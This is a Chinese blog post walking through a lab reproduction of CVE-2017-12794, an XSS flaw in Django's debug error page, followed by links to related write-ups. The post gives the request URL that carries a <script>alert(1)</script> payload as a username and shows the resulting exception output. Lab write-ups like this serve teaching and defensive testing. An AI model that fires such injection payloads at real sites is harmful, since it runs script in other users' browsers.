Django debug page XSS漏洞复现_(CVE-2017-12794)

最新推荐文章于 2024-10-02 14:09:43 发布
最新推荐文章于 2024-10-02 14:09:43 发布
阅读量657 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: django xss python 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134334892
版权

Django debug page XSS漏洞复现_(CVE-2017-12794)

复现过程

首先进入靶场环境

image-20231110152918702

按照他写的,需要给这个变量赋值

image-20231110153700531

创建一个用户,用弹窗做用户名

http://10.4.7.137:8000/create_user/?username=<script>alert(1)</script>

image-20231110153946042

返回,然后再创建一个一样的

触发异常弹窗

image-20231110154031232

异常为

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.

详情见

https://vulhub.org/#/environments/django/CVE-2017-12794/

order libra
关注
专栏目录
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794
qq_51577576的博客
09-29 1852
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794 DjangoDjango软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。
14 - vulhub - Django debug page XSS漏洞CVE-2017-12794)(1)
2401_83621136的博客
03-20 820
我们可以看看代码,的__exit__函数:defreturnDataError,Error,):’):exc_value.
php debug模式漏洞,新型php漏洞挖掘之debug导致的安全漏洞(Edusoho)
weixin_33277215的博客
04-10 566
【过年了,每天发一篇以前的存货,一共七篇。】现代cms框架(laraval/symfony/slim)的出现,导致现今的php漏洞出现点、原理、利用方法,发生了一些变化,这个系列希望可以总结一下自己挖掘的此类cms漏洞。今天这个漏洞是Edusoho的一个user表dump漏洞。首先,我简要说明一下漏洞原理。【漏洞源码下载: https://mega.nz/#!4chVWCAB!xBVyC9Qqx...
Django debug page XSS漏洞
OldBowl
12-06 941
Django debug page XSS漏洞CVE-2017-12794)学习
Django debug page XSS漏洞CVE-2017-12794
07-18 875
漏洞复现:1.创建个用户:ip:8000/create_user/?username=<script>alert(7)</script>显示用户已创建。2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>3.触发异常:duplicate key value violate...
Django_debug_page_XSS漏洞 CVE-2017-12794 漏洞复现
ADummy的博客
02-22 331
Django debug page XSS漏洞(CVE-2017-12794) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 ​ Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。(由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定)。在path开头为//example.
关于weblogic的bea_wls_internal之error message on page漏洞的解决办法
东方郭的博客
05-09 4209
之前在做国网项目安全测试时候,被扫描出error message on page漏洞,主要涉及的均为bea_wls_internal包下的文件,例如 error message on page漏洞为发现了可能泄露敏感信息的错误或警告消息。该消息还可能包含生成未处理异常的文件的位置; 对于该异常扫描工具提供的的解决办法为:验证此页面是否公开错误或警告消息,并正确配置应用程序以将错误记录到文...
Django debug page XSS漏洞CVE-2017-12794漏洞复现
huayimy的博客
05-11 419
Django debug page XSS漏洞CVE-2017-12794漏洞复现
14 - vulhub - Django debug page XSS漏洞CVE-2017-12794
易编橙 · 终身成长社群,相遇已是上上签!
10-25 711
Django 是一个由 Python 编写的一个开放源代码的 Web 应用框架。 使用 Django,只要很少的代码,Python 的程序开发人员就可以轻松地完成一个正式网站所需要的大部分内容,并进一步开发出全功能的 Web 服务, Django 本身基于 MVC 模型,即 Model(模型)+ View(视图)+ Controller(控制器)设计模式,MVC 模式使后续对程序的修改和扩展简化,并且使程序某一部分的重复利用成为可能。
CVE-2017-12794_Django debug page XSS漏洞
mirocky的博客
12-28 668
3、向数据库中插入相同数据,Django报错,数据被打印且执行。对打印的exception进行了HTML转义。2、首次向数据库中插入数据,成功插入。1、vulhub搭建环境。
利用Vulnhub复现漏洞 - Django debug page XSS漏洞CVE-2017-12794)分析
JiangBuLiu的博客
07-02 2038
Django debug page XSS漏洞CVE-2017-12794)分析Vulnhub官方复现教程漏洞原理漏洞复现启动环境创建用户触发漏洞漏洞利用 Vulnhub官方复现教程 https://vulhub.org/#/environments/django/CVE-2017-12794/ 漏洞原理 在使用Postgres数据库并触发异常的时候,psycopg2会将字段名和字段值全部抛出。...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1240
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Apache2-XXE漏洞渗透
一纸荒芜的博客
07-04 4677
Apache2 Ubuntu Default Page XXE漏洞渗透
Django Nginx+uwsgi 安装配置
lly202406的博客
10-02 212
本文将详细介绍如何在Linux环境下安装和配置Django应用程序,使用Nginx作为Web服务器和uwsgi作为应用程序服务器。
Django学习笔记四:urls配置详解
最新发布
软件行业技术文化交流。
10-02 340
Django是一个高级的Python Web框架,它鼓励快速开发和干净、实用的设计。URL配置是Django框架中非常重要的一部分,它定义了URL模式与视图函数之间的映射关系。
Vue.js与Flask/Django后端的配合----案例详细说明
l1337224493的博客
09-29 1154
通过以上案例,我们展示了如何将Vue.js与Flask或Django后端结合使用,以构建一个完整的Web应用。前后端分离的架构使得开发更加灵活,能够独立处理前端和后端的功能。Flask和Django为后端提供了强大的支持,而Vue.js则为用户界面提供了流畅的体验。在实际开发中,还可以根据项目需求扩展更多功能,如用户权限管理、评论系统、文章分类等。无论是使用Flask还是Django,核心思想是通过RESTful API实现前后端的高效协作,为用户提供优质的应用体验。
Vue.js与Flask/Django后端的协同开发研究
vvvae1234的博客
09-29 1661
前后端分离是指将客户端(前端)和服务器端(后端)进行逻辑上的分离。前端使用现代JavaScript框架(如Vue.js、React、Angular等)进行用户界面开发,后端则使用如Node.js、Flask、Django等技术提供API服务。这种架构有助于提高开发效率,使得前后端团队可以独立开发、协作,并加速项目迭代。Vue.js:一个渐进式JavaScript框架,专注于构建用户界面。Vue.js的核心库只关注视图层,易于与第三方库或既有项目进行整合。Flask。
django创建一个新的应用
forecasts的博客
09-29 352
命令可以在你的 Django 项目中创建一个新的应用,名为 myapp。应用是 Django 项目的组成部分,可以帮助你组织代码和功能。执行该命令后,会在你的项目目录下创建一个名为 myapp 的文件夹,包含一些基本文件和结构。接下来可以在 models.py 中定义数据库模型,在 views.py 中编写视图函数,结合 URL 路由和模板文件实现更多功能。向项目的设置文件(settings.py)中添加新应用的名称。确保你已经在 Django 项目目录中(即含有 manage.py 的目录)。
CVE-2017-12794
10-07
CVE-2017-12794是一个影响Django框架的安全漏洞。这个漏洞源于Django框架中的Technical 500 Template没有正确过滤用户提交的输入。攻击者可以利用这个漏洞在浏览器中执行任意的脚本代码,从而导致跨站脚本攻击(XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值